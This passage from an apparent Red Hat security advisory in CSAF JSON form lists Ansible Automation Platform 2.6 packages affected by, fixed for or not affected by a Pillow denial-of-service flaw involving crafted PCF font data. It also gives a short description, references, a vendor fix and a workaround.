"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497464"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing specially crafted PCF font data. This data, when processed, can lead to excessive memory allocation because the library does not properly check for decompression bombs. The primary consequence is a Denial of Service (DoS), which could make the affected system or application unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted PCF font data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Python Pillow library. The PcfFontFile._load_bitmaps() method reads glyph dimensions from the PCF METRICS section and passes them directly to Image.frombytes() without calling Image._decompression_bomb_check(). This allows crafted PCF font data to cause excessive memory allocation, leading to a denial of service condition. An attacker could exploit this by providing a specially crafted PCF font file to an application that uses Pillow\u0027s font loading functionality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54059"
},
{
"category": "external",
"summary": "RHBZ#2497464",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497464"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54059"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54059",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54059"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-8v84-f9pq-wr9x",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-8v84-f9pq-wr9x"
}
],
"release_date": "2026-07-06T18:46:09.433000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "Do not load PCF fonts from untrusted sources. If PCF font loading is required, validate font file dimensions before passing them to Pillow, or upgrade to Pillow 12.3.0 or later which includes the fix for this vulnerability.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
